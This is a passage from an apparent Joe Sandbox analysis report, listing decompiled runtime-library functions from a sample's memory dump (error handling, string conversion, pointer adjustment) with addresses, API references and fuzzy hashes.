									_push( *(_t111 + 0x14));
									_push(_t98);
									_push(_t85);
									_t77 =  *((intOrPtr*)(_t111 + 8));
									_push( *((intOrPtr*)(_t111 + 8)));
									_t58 = E0019B351(_t77, _t103, _t108, __eflags) - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										_t61 = E0019C057(_t103, _t108[0x18], E001998EF( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
									} else {
										_t61 = _t58 - 1;
										__eflags = _t61;
										if(_t61 == 0) {
											_t61 = E0019C067(_t103, _t108[0x18], E001998EF( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
										}
									}
									 *(_t111 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t61;
								} else {
									 *_t107 = _t84;
									_push( &(_t101[8]));
									_push(_t84);
									L21:
									 *_t107 = E001998EF();
									L29:
									 *(_t111 - 4) = 0xfffffffe;
									_t53 = _t75;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}

0x0019b351
0x0019b353
0x0019b358
0x0019b35d
0x0019b35f
0x0019b362
0x0019b367
0x0019b477
0x0019b477
0x0019b477
0x00000000
0x0019b376
0x0019b376
0x0019b37b
0x0019b385
0x0019b387
0x0019b38c
0x0019b391
0x0019b391
0x0019b393
0x0019b396
0x0019b39b
0x0019b3bd
0x0019b3bd
0x0019b3c0
0x0019b3c3
0x0019b3e1
0x0019b3e4
0x0019b423
0x0019b426
0x0019b429
0x0019b44e
0x0019b450
0x00000000
0x0019b452
0x0019b452
0x0019b454
0x00000000
0x0019b456
0x0019b456
0x0019b45b
0x0019b45f
0x0019b45f
0x0019b460
0x00000000
0x0019b460
0x0019b454
0x0019b42b
0x0019b42b
0x0019b42d
0x00000000
0x0019b42f
0x0019b42f
0x0019b431
0x00000000
0x0019b433
0x0019b444
0x00000000
0x0019b449
0x0019b431
0x0019b42d
0x0019b3e6
0x0019b3e6
0x0019b3ea
0x00000000
0x0019b3f0
0x0019b3f0
0x0019b3f2
0x00000000
0x0019b3f8
0x0019b3ff
0x0019b407
0x0019b40b
0x0019b40d
0x0019b410
0x0019b415
0x0019b416
0x00000000
0x0019b416
0x0019b410
0x00000000
0x0019b40b
0x0019b3f2
0x0019b3ea
0x0019b3c5
0x0019b3c5
0x00000000
0x0019b3c5
0x0019b3a2
0x0019b3a2
0x0019b3a7
0x0019b3ac
0x00000000
0x0019b3ae
0x0019b3b0
0x0019b3b9
0x0019b3c8
0x0019b3ca
0x0019b489
0x0019b489
0x0019b48e
0x0019b48f
0x0019b491
0x0019b496
0x0019b49b
0x0019b49e
0x0019b4a1
0x0019b4a4
0x0019b4ad
0x0019b4ad
0x0019b4a6
0x0019b4a6
0x0019b4a6
0x0019b4b0
0x0019b4b4
0x0019b4b7
0x0019b4b8
0x0019b4b9
0x0019b4ba
0x0019b4bd
0x0019b4c6
0x0019b4c6
0x0019b4c9
0x0019b4ff
0x0019b4cb
0x0019b4cb
0x0019b4cb
0x0019b4ce
0x0019b4e5
0x0019b4e5
0x0019b4ce
0x0019b504
0x0019b50e
0x0019b51a
0x0019b3d8
0x0019b3d8
0x0019b3dd
0x0019b3de
0x0019b418
0x0019b41f
0x0019b463
0x0019b463
0x0019b46a
0x0019b479
0x0019b47c
0x0019b488
0x0019b488
0x0019b3ca
0x0019b3ac
0x00000000
0x00000000
0x00000000
0x0019b37b

APIs

___AdjustPointer.LIBCMT ref: 0019B418
___AdjustPointer.LIBCMT ref: 0019B43B
___AdjustPointer.LIBCMT ref: 0019B4D7

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 90d978892fefa45f65c10393c4856037673171871f3e5fa91837217db98dbb3b
Instruction ID: 6fbf49cbcc1b75d7e08010b3dfd5a0dae86928e43c6bae14d572497cd5aa04b3
Opcode Fuzzy Hash: 90d978892fefa45f65c10393c4856037673171871f3e5fa91837217db98dbb3b
Instruction Fuzzy Hash: 40511572608606EFEF289F54EAC1B7A73A4FF10310F14452DE906872A2D731ED40EB91

Uniqueness

Uniqueness Score: -1.00%

Function 0019185F Relevance: 6.1, APIs: 4, Instructions: 119
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E0019185F(void* __ebx, void* __edx, void* __eflags, short* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v4;
				char _v12;
				char _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short* _v36;
				signed int _v48;
				char _v60;
				void* __edi;
				void* __esi;
				signed int _t23;
				void* _t26;
				intOrPtr _t27;
				void* _t30;
				void* _t33;
				void* _t40;
				void* _t43;
				intOrPtr _t45;
				short* _t46;
				void* _t47;
				intOrPtr _t48;
				void* _t49;
				void* _t51;
				void* _t59;
				void* _t60;
				intOrPtr _t61;
				signed int _t62;
				short* _t64;
				void* _t65;
				void* _t67;
				void* _t68;
				signed int _t69;
				void* _t71;
				short* _t73;
				intOrPtr _t77;
				void* _t78;
				signed int _t79;

				_t59 = __edx;
				_t79 = _t78 - 0x28;
				_t23 =  *0x1c3014; // 0x88921fa2
				_v4 = _t23 ^ _t79;
				asm("xorps xmm0, xmm0");
				_push(__ebx);
				_t73 = _a4;
				_v36 = _t73;
				_v32 = _a12;
				asm("movlpd [esp+0x28], xmm0");
				_t26 = E0019FC20(_t73);
				_t49 = _t60;
				_t27 = _t26 + 1;
				_t45 = _t73;
				_v28 = _t27;
				_t61 = _t27;
				_t67 = 0;
				if(_t27 != 0) {
					_t77 = _v32;
					while(1) {
						_t43 = E00195981(_t49,  &_v24, _t45, _t61,  &_v20, _t77);
						_t79 = _t79 + 0x14;
						if(_t43 <= 0) {
							break;
						}
						_t45 = _t45 + _t43;
						_t67 = _t67 + 1;
						_t61 = _t61 - _t43;
						if(_t61 != 0) {
							continue;
						}
						break;
					}
					_t73 = _v36;
				}
				_t68 = _t67 + 1;
				_push(2);
				_t46 = E0019C583();
				_v36 = _t46;
				_t51 = _t68;
				if(_t46 == 0) {
					E00195E7D(__eflags);
					asm("int3");
					_push(_t73);
					_push(_t61);
					_t62 = _v48;
					__eflags = _t62;
					if(_t62 != 0) {
						__eflags =  *_t62;
						if(__eflags == 0) {
							_push(_t68);
							_t69 = E00197F22(_t68, __eflags, 0x44);
							_t33 = E001916B9(_t46,  &_v60, _t62, _t69, E00191807(_a8));
							_t20 = _t69 + 4;
							 *_t20 =  *(_t69 + 4) & 0x00000000;
							__eflags =  *_t20;
							 *_t69 = 0x1b4300;
							E001919B2(_t69, _t33);
							 *_t62 = _t69;
							E00191711( &_v60, _t62, _t69);
						}
					}
					_t30 = 2;
					return _t30;
				} else {
					asm("xorps xmm0, xmm0");
					_t64 = _t46;
					asm("movlpd [esp+0x2c], xmm0");
					if(_t68 != 0) {
						_t48 = _v28;
						while(1) {
							_t40 = E00195981(_t51, _t64, _t73, _t48,  &_v12, _v32);
							_t79 = _t79 + 0x14;
							if(_t40 <= 0) {
								break;
							}
							_t73 = _t73 + _t40;
							_t64 = _t64 + 2;
							_t68 = _t68 - 1;
							if(_t68 != 0) {
								continue;
							}
							break;
						}
						_t46 = _v36;
					}
					 *_t64 = 0;
					_pop(_t65);
					_pop(_t71);
					_pop(_t47);
					return E00197F14(_t46, _t47, _v4 ^ _t79, _t59, _t65, _t71);
				}
			}

0x0019185f
0x0019185f
0x00191862
0x00191869
0x00191871
0x00191874
0x00191876
0x0019187d
0x00191881
0x00191885
0x0019188b
0x00191890
0x00191891
0x00191894
0x00191898
0x0019189c
0x0019189e
0x0019189f
0x001918a1
0x001918a5
0x001918b2
0x001918b7
0x001918bc
0x00000000
0x00000000
0x001918be
0x001918c0
0x001918c1
0x001918c3
0x00000000
0x00000000
0x00000000
0x001918c3
0x001918c5
0x001918c5
0x001918c9
0x001918ca
0x001918d2
0x001918d4
0x001918d9
0x001918dc
0x00191931
0x00191936
0x00191937
0x0019193d
0x0019193e
0x00191941
0x00191943
0x00191945
0x00191948
0x0019194a
0x00191956
0x00191961
0x00191966
0x00191966
0x00191966
0x0019196d
0x00191973
0x0019197b
0x0019197d
0x00191982
0x00191948
0x00191985
0x00191988
0x001918de
0x001918de
0x001918e1
0x001918e3
0x001918eb
0x001918ed
0x001918f1
0x001918fd
0x00191902
0x00191907
0x00000000
0x00000000
0x00191909
0x0019190b
0x0019190e
0x00191911
0x00000000
0x00000000
0x00000000
0x00191911
0x00191913
0x00191913
0x0019191d
0x00191922
0x00191923
0x00191925
0x00191930
0x00191930

APIs

_strlen.LIBCMT ref: 0019188B
Concurrency::cancel_current_task.LIBCPMT ref: 00191931
ctype.LIBCPMT ref: 00191973
std::_Locinfo::~_Locinfo.LIBCPMT ref: 0019197D

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_taskLocinfoLocinfo::~__strlenctypestd::_
String ID:
API String ID: 2131814884-0
Opcode ID: a921aac32882211a9682c0e1c9b170baf96578fbbe6ae4eabfcccaabaf076c41
Instruction ID: f1ee6f63b7082c1d85afffeac9d9f01cdb4764e3e436d4abeddfdcf51f250bda
Opcode Fuzzy Hash: a921aac32882211a9682c0e1c9b170baf96578fbbe6ae4eabfcccaabaf076c41
Instruction Fuzzy Hash: 7C31D372A08306AFDB10EF69D841B6BB7E8EFA9754F40092DF94497242E730D9858792

Uniqueness

Uniqueness Score: -1.00%

Function 001AC54D Relevance: 6.1, APIs: 4, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E001AC54D(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t29;
				char _t31;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					_t31 = 0;
					__eflags =  *_t40;
					if( *_t40 != 0) {
						_t16 = E001AC142(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t16;
						if(__eflags != 0) {
							_t38 = _a8;
							__eflags = _t16 -  *((intOrPtr*)(_t38 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t17 = E001AC142(_a16, _t31, _t40, 0xffffffff,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t31, _t31);
								__eflags = _t17;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t17 - 1;
									_t19 = 0;
									__eflags = 0;
								} else {
									E0019FCEE(GetLastError());
									_t19 =  *((intOrPtr*)(E0019FD24(__eflags)));
								}
								L14:
								return _t19;
							}
							_t19 = E001ACB13(_t38, __eflags, _t16);
							__eflags = _t19;
							if(_t19 != 0) {
								goto L14;
							}
							goto L11;
						}
						E0019FCEE(GetLastError());
						return  *((intOrPtr*)(E0019FD24(__eflags)));
					}
					_t41 = _a8;
					__eflags =  *((intOrPtr*)(_t41 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = _t31;
						L2:
						 *((intOrPtr*)(_t41 + 0x10)) = _t31;
						return 0;
					}
					_t29 = E001ACB13(_t41, __eflags, 1);
					__eflags = _t29;
					if(_t29 != 0) {
						return _t29;
					}
					goto L6;
				}
				_t41 = _a8;
				E001A27D8(_t41);
				_t31 = 0;
				 *((intOrPtr*)(_t41 + 8)) = 0;
				 *((intOrPtr*)(_t41 + 0xc)) = 0;
				goto L2;
			}

0x001ac554
0x001ac559
0x001ac577
0x001ac579
0x001ac57c
0x001ac5a9
0x001ac5b1
0x001ac5b3
0x001ac5cc
0x001ac5cf
0x001ac5d2
0x001ac5e0
0x001ac5ef
0x001ac5f7
0x001ac5f9
0x001ac612
0x001ac615
0x001ac615
0x001ac5fb
0x001ac602
0x001ac60d
0x001ac60d
0x001ac617
0x00000000
0x001ac617
0x001ac5d7
0x001ac5dc
0x001ac5de
0x00000000
0x00000000
0x00000000
0x001ac5de
0x001ac5bc
0x00000000
0x001ac5c7
0x001ac57e
0x001ac581
0x001ac584
0x001ac597
0x001ac59a
0x001ac56d
0x001ac56d
0x00000000
0x001ac570
0x001ac58a
0x001ac58f
0x001ac591
0x001ac61b
0x001ac61b
0x00000000
0x001ac591
0x001ac55b
0x001ac560
0x001ac565
0x001ac567
0x001ac56a
0x00000000

APIs

Part of subcall function 001A27D8: _free.LIBCMT ref: 001A27E6

Part of subcall function 001AC142: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,001A7EF6,?,00000000,00000000), ref: 001AC1EE

GetLastError.KERNEL32 ref: 001AC5B5
__dosmaperr.LIBCMT ref: 001AC5BC
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 001AC5FB
__dosmaperr.LIBCMT ref: 001AC602

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 2bf5b94252db2aac6ec3d2c61f3643e6a3ac889c2f91b96aea4070bb7423946a
Instruction ID: ef3e3f26e3f12bf7fbbabc5d2cdd3f1f2fa803a995365b213b45eb98fba5fcbd
Opcode Fuzzy Hash: 2bf5b94252db2aac6ec3d2c61f3643e6a3ac889c2f91b96aea4070bb7423946a
Instruction Fuzzy Hash: 8621D379600705BF9B20AF65DC81C6AB7ACFF563E47158628F818D7241D731EC418BE0

Uniqueness

Uniqueness Score: -1.00%

Function 001A5D71 Relevance: 6.1, APIs: 4, Instructions: 72
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E001A5D71(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0x1c31a0; // 0x2
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E001A846A(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t51 = E001A58A2(1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E001A846A(__eflags,  *0x1c31a0, _t51);
							if(__eflags != 0) {
								E001A5B9F(_t51, 0x1f0d34);
								E001A71B2(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E001A846A(__eflags,  *0x1c31a0, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E001A846A(0,  *0x1c31a0, 0);
							_push(0);
							L9:
							E001A71B2();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E001A842B(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0x1c31a0; // 0x2
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E001A24F9(_t39, _t43, _t49, _t53, _t60);
					asm("int3");
					_t5 =  *0x1c31a0; // 0x2
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E001A846A(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E001A58A2(1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E001A846A(__eflags,  *0x1c31a0, _t60);
								if(__eflags != 0) {
									E001A5B9F(_t60, 0x1f0d34);
									E001A71B2(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E001A846A(__eflags,  *0x1c31a0, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E001A846A(__eflags,  *0x1c31a0, _t20);
								_push(_t60);
								L25:
								E001A71B2();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E001A842B(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0x1c31a0; // 0x2
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E001A24F9(_t39, _t43, _t49, _t53, _t60);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0x1c31a0; // 0x2
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E001A846A(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E001A58A2(1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E001A846A(__eflags,  *0x1c31a0, _t54);
											if(__eflags != 0) {
												E001A5B9F(_t54, 0x1f0d34);
												E001A71B2(0);
												goto L45;
											} else {
												_t40 = 0;
												E001A846A(__eflags,  *0x1c31a0, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E001A846A(0,  *0x1c31a0, 0);
											_push(0);
											L41:
											E001A71B2();
											goto L36;
										}
									}
								} else {
									_t54 = E001A842B(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0x1c31a0; // 0x2
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}

0x001a5d71
0x001a5d71
0x001a5d7c
0x001a5d7e
0x001a5d83
0x001a5d86
0x001a5da4
0x001a5da7
0x001a5dac
0x001a5dae
0x00000000
0x001a5db0
0x001a5dbc
0x001a5dbf
0x001a5dc0
0x001a5dc2
0x001a5de7
0x001a5de9
0x001a5e02
0x001a5e09
0x001a5e0e
0x00000000
0x001a5deb
0x001a5deb
0x001a5df4
0x001a5df9
0x00000000
0x001a5df9
0x001a5dc4
0x001a5dc4
0x001a5dc4
0x001a5dcd
0x001a5dd2
0x001a5dd3
0x001a5dd3
0x001a5dd8
0x00000000
0x001a5dd8
0x001a5dc2
0x001a5d88
0x001a5d8e
0x001a5d92
0x001a5d9f
0x00000000
0x001a5d94
0x001a5d97
0x001a5e11
0x001a5e11
0x001a5d99
0x001a5d99
0x001a5d99
0x001a5d9b
0x001a5d9b
0x001a5d9b
0x001a5d97
0x001a5d92
0x001a5e14
0x001a5e1c
0x001a5e1e
0x001a5e20
0x001a5e28
0x001a5e2d
0x001a5e2e
0x001a5e33
0x001a5e34
0x001a5e37
0x001a5e51
0x001a5e54
0x001a5e59
0x001a5e5b
0x00000000
0x001a5e5d
0x001a5e69
0x001a5e6c
0x001a5e6d
0x001a5e6f
0x001a5e92
0x001a5e94
0x001a5eab
0x001a5eb2
0x001a5eb7
0x00000000
0x001a5e96
0x001a5e9d
0x001a5ea2
0x00000000
0x001a5ea2
0x001a5e71
0x001a5e78
0x001a5e7d
0x001a5e7e
0x001a5e7e
0x001a5e83
0x00000000
0x001a5e83
0x001a5e6f
0x001a5e39
0x001a5e3f
0x001a5e41
0x001a5e43
0x001a5e4c
0x00000000
0x001a5e45
0x001a5e45
0x001a5e48
0x001a5ec2
0x001a5ec2
0x001a5ec7
0x001a5eca
0x001a5ecb
0x001a5ecc
0x001a5ed3
0x001a5ed5
0x001a5eda
0x001a5edd
0x001a5efb
0x001a5efe
0x001a5f03
0x001a5f05
0x00000000
0x001a5f07
0x001a5f13
0x001a5f17
0x001a5f19
0x001a5f3e
0x001a5f40
0x001a5f59
0x001a5f60
0x00000000
0x001a5f42
0x001a5f42
0x001a5f4b
0x001a5f50
0x00000000
0x001a5f50
0x001a5f1b
0x001a5f1b
0x001a5f1b
0x001a5f24
0x001a5f29
0x001a5f2a
0x001a5f2a
0x00000000
0x001a5f2f
0x001a5f19
0x001a5edf
0x001a5ee5
0x001a5ee7
0x001a5ee9
0x001a5ef6
0x00000000
0x001a5eeb
0x001a5eeb
0x001a5eee
0x001a5f68
0x001a5f68
0x001a5ef0
0x001a5ef0
0x001a5ef0
0x001a5ef0
0x001a5ef2
0x001a5ef2
0x001a5ef2
0x001a5eee
0x001a5ee9
0x001a5f6b
0x001a5f73
0x001a5f75
0x001a5f75
0x001a5f7c
0x001a5e4a
0x001a5eba
0x001a5eba
0x001a5ebc
0x00000000
0x001a5ebe
0x001a5ec1
0x001a5ec1
0x001a5ebc
0x001a5e48
0x001a5e43
0x001a5e22
0x001a5e27
0x001a5e27

APIs

GetLastError.KERNEL32(?,00000000,?,0019D1A2,00000000,00000000,?,?,001A8943,00000000,00000000,00000000,00000000,?), ref: 001A5D76
_free.LIBCMT ref: 001A5DD3
_free.LIBCMT ref: 001A5E09
SetLastError.KERNEL32(00000000,00000002,000000FF,?,001A8943,00000000,00000000,00000000,00000000,?), ref: 001A5E14

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 93d970fdf287582f6b7c3eadff453d597d7648338a846416a4b1872906f32d2b
Instruction ID: cdfa3fef626bec8be73acdd3594b704d3f2f15cb58ff126f90d00d8b58808005
Opcode Fuzzy Hash: 93d970fdf287582f6b7c3eadff453d597d7648338a846416a4b1872906f32d2b
Instruction Fuzzy Hash: C2112C3E20CF01AFE71167B4AC86E6B356BABE73757250234F225821D1DF208D459110

Uniqueness

Uniqueness Score: -1.00%

Function 001A5EC8 Relevance: 6.1, APIs: 4, Instructions: 69
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E001A5EC8(void* __ecx) {
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				signed int _t18;
				long _t21;

				_t21 = GetLastError();
				_t2 =  *0x1c31a0; // 0x2
				_t24 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E001A846A(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t18 = E001A58A2(1, 0x364);
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E001A846A(__eflags,  *0x1c31a0, _t18);
							if(__eflags != 0) {
								E001A5B9F(_t18, 0x1f0d34);
								E001A71B2(0);
								goto L13;
							} else {
								_t13 = 0;
								E001A846A(__eflags,  *0x1c31a0, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E001A846A(0,  *0x1c31a0, 0);
							_push(0);
							L9:
							E001A71B2();
							goto L4;
						}
					}
				} else {
					_t18 = E001A842B(_t24, _t2);
					if(_t18 == 0) {
						_t2 =  *0x1c31a0; // 0x2
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							_t13 = _t18;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t18 = _t13;
						}
					}
				}
				SetLastError(_t21);
				asm("sbb edi, edi");
				return  ~_t18 & _t13;
			}

0x001a5ed3
0x001a5ed5
0x001a5eda
0x001a5edd
0x001a5efb
0x001a5efe
0x001a5f03
0x001a5f05
0x00000000
0x001a5f07
0x001a5f13
0x001a5f17
0x001a5f19
0x001a5f3e
0x001a5f40
0x001a5f59
0x001a5f60
0x00000000
0x001a5f42
0x001a5f42
0x001a5f4b
0x001a5f50
0x00000000
0x001a5f50
0x001a5f1b
0x001a5f1b
0x001a5f1b
0x001a5f24
0x001a5f29
0x001a5f2a
0x001a5f2a
0x00000000
0x001a5f2f
0x001a5f19
0x001a5edf
0x001a5ee5
0x001a5ee9
0x001a5ef6
0x00000000
0x001a5eeb
0x001a5eee
0x001a5f68
0x001a5f68
0x001a5ef0
0x001a5ef0
0x001a5ef0
0x001a5ef2
0x001a5ef2
0x001a5ef2
0x001a5eee
0x001a5ee9
0x001a5f6b
0x001a5f73
0x001a5f7c

APIs

GetLastError.KERNEL32(?,?,?,0019FD29,001A875D,?,?,00198B75,?,?,?,?,?,00191221,?,?), ref: 001A5ECD
_free.LIBCMT ref: 001A5F2A
_free.LIBCMT ref: 001A5F60
SetLastError.KERNEL32(00000000,00000002,000000FF,?,?,00198B75,?,?,?,?,?,00191221,?,?), ref: 001A5F6B

Memory Dump Source

Source File: 00000001.00000002.279331771.0000000000191000.00000020.00000001.01000000.00000008.sdmp, Offset: 00190000, based on PE: true

Associated: 00000001.00000002.279317904.0000000000190000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279360920.00000000001B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279424896.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279438356.00000000001F0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.279552010.00000000001F2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_190000_123.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: c8c7ae5d7325ed0c8f75730f20187059bafbaf472577f00e270e5495656a30c0
Instruction ID: c308a21815ab0eb13c738f797b88eb7e297f905de101f80225eca8e173428153
Opcode Fuzzy Hash: c8c7ae5d7325ed0c8f75730f20187059bafbaf472577f00e270e5495656a30c0
Instruction Fuzzy Hash: 15112B3A20CE02AEE7116778AC82E6B359BABE7775B294234F625825D1DF30CD459120

Uniqueness

Uniqueness Score: -1.00%

Function 001950B0 Relevance: 6.1, APIs: 4, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E001950B0(signed int __edx, void* __eflags, intOrPtr _a4, char _a16) {
				signed int _v8;
				signed short* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
